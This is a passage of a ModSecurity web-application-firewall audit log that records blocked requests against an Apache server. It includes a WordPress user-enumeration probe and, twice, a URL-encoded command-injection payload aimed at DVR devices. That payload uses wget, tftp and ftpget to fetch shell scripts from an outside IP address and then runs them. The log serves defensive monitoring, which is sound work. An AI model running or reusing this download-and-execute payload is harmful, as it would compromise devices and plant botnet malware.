text/html; charset=iso-8859-1 --ae711468-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750046848694875 2293 (- - -) Stopwatch2: 1750046848694875 2293; combined=1079, p1=396, p2=642, p3=0, p4=0, p5=41, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae711468-Z-- --b6c7d600-A-- [16/Jun/2025:11:16:07 +0700] aE-ah9PYN2mzu-AuhSOpjgAAAAs 103.236.140.4 53890 103.236.140.4 8181 --b6c7d600-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 104.167.221.114 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.167.221.114 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --b6c7d600-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6c7d600-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750047367595227 999 (- - -) Stopwatch2: 1750047367595227 999; combined=417, p1=380, p2=0, p3=0, p4=0, p5=37, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6c7d600-Z-- --d6a6f277-A-- [16/Jun/2025:11:36:02 +0700] aE-fMi-4qihuRDlKQ4l5QAAAAMI 103.236.140.4 54044 103.236.140.4 8181 --d6a6f277-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.111.234.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.111.234.35 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d6a6f277-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6a6f277-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750048562263810 3373 (- - -) Stopwatch2: 1750048562263810 3373; combined=1480, p1=529, p2=915, p3=0, p4=0, p5=36, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6a6f277-Z-- --38a8c76d-A-- [16/Jun/2025:12:28:32 +0700] aE-rgGf-_Obc6SnO-jx4HgAAAJc 103.236.140.4 54812 103.236.140.4 8181 --38a8c76d-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 104.167.221.114 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.167.221.114 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --38a8c76d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38a8c76d-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750051712843615 943 (- - -) Stopwatch2: 1750051712843615 943; combined=423, p1=376, p2=0, p3=0, p4=0, p5=47, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38a8c76d-Z--